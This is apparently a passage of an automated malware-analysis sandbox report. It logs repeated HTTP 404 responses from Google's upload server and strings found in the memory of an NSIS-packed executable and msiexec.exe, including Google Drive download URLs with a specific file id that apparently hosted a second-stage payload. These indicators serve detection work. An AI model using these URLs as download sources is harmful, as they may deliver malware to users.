ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRlptH7J1TKSzvv8evJ2qpSzZ3kU64Du9KPy1O9MKOIxmaLv1D96t-FPfeQwEetCR_RContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Vqvf4A1zggustACNTOT0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTREGdHyp4RywoRttCGgWhedIATLdJZzv_rpqovQK6k-VgQLIs7_mqX2WOfqSwSKL1mbzR0zfMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-zfy2j5ccnZ2qEdho-o7TQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRN0cwsj3FUUKmQmwP71COfVyoi6F0xtaP3CI_cOZ7GOyW4Vs7WIp-X25GXx5akau8HVVzEfUMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:41 GMTContent-Security-Policy: script-src 'nonce-rT59B8WfDSBiVvGLh_8XoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSXrwKRoOqPl4CB2RlFmPJNOQsqJLoF0E0ZQaWwrwcedMwyaVXfESSmSIbgTQaJZcBvVJng6_IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:43 GMTContent-Security-Policy: script-src 'nonce-WGyD_e7H0bbv6N7FvIU4XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRo59NbKQJw-_9ZOHN8AfRgSaOtEzPN3q1UsbsgeOwVLi8mYZ9uxaTW2SYyaaJS4S7B26xe7uoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:46 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-l7J4jj96iu_0j946Oxw1tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSaiIs0zbAQMhy4Ips-bMtrCicORjtn_SS1kE8_P5VGt-xQ231l-pUQtAxbF_ZefzddContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:48 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-af3_tJ45qllWU-iYta-lOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT3ChIzEipnzJLCW1nBY9hMnrDSe1ACYSZHomNXqOVOfWLsTcx8EdYuc0GIuCu4cCexoWULx1UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:50 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qTWvvKDlN3ztMVBdsqVEsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5paZzRAK-3E1VjMQtSMfY5snrS7kFx5Iy_4oAgwhV1MxgbTnAAe6cKN16MMt6RJmpM4rsTr5IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:45:53 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZgLAn8mz622gRtL_1658vA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: vq6jxdGvD6.exe, vq6jxdGvD6.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vq6jxdGvD6.exe, vq6jxdGvD6.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000003.2999392456.0000000008950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=d
Source: msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330181183.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3353015327.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319145629.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3364613399.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: msiexec.exe, 00000006.00000003.3246654914.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/B
Source: msiexec.exe, 00000006.00000002.3389908323.00000000088DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/CnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=download
Source: msiexec.exe, 00000006.00000002.3389908323.00000000088DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/CnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=downloadider
Source: msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/R
Source: msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999392456.0000000008950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/V
Source: msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3081860539.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/j
Source: msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3022070697.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3021978943.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3046183257.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3046245700.0000000008950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/r
Source: msiexec.exe, 00000006.00000003.2999349054.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2987663105.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2999392456.0000000008950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/rB
Source: msiexec.exe, 00000006.00000003.3166122058.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3212329837.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv&export=do
Source: msiexec.exe, 00000006.00000003.2951191578.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/rj
Source: msiexec.exe, 00000006.00000003.2940123153.0000000008953000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/t
Source: msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv
Source: msiexec.exe, 00000006.00000002.3389908323.0000000008921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv(c
Source: msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3246654914.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3223643370.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3235246525.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyv32859Z
Source: msiexec.exe, 00000006.00000003.2940267464.0000000008932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0MayyvH
Source: msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3154893451.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330181183.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3353015327.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319145629.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3364613399.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3177857063.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3166122058.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0MayyvR3JHvOGRl0Mayyv
Source: msiexec.exe, 00000006.00000003.3034643119.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3010879798.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3022070697.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3021978943.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3092662309.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3046183257.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3046245700.0000000008950000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3069176977.0000000008951000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3081860539.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0MayyvR3JHvOGRl0Mayyvg
Source: msiexec.exe, 00000006.00000003.2975192290.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2963786170.0000000008953000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2975340648.0000000008950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0MayyvR7
Source: msiexec.exe, 00000006.00000003.3258764591.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3342005000.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3375721612.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3246654914.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3330181183.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3353015327.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3319145629.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3364613399.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyvg
Source: msiexec.exe, 00000006.00000002.3389908323.00000000088DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyvk
Source: msiexec.exe, 00000006.00000002.3389908323.0000000008921000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gGCnYNa6YkdxSp2n6R3JHvOGRl0Mayyvst
Source: msiexec.exe, 00000006.00000003.3294650139.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3272194025.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3069176977.0000000008951000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3283115418.000000000894E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3306010577.000000000894E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/z
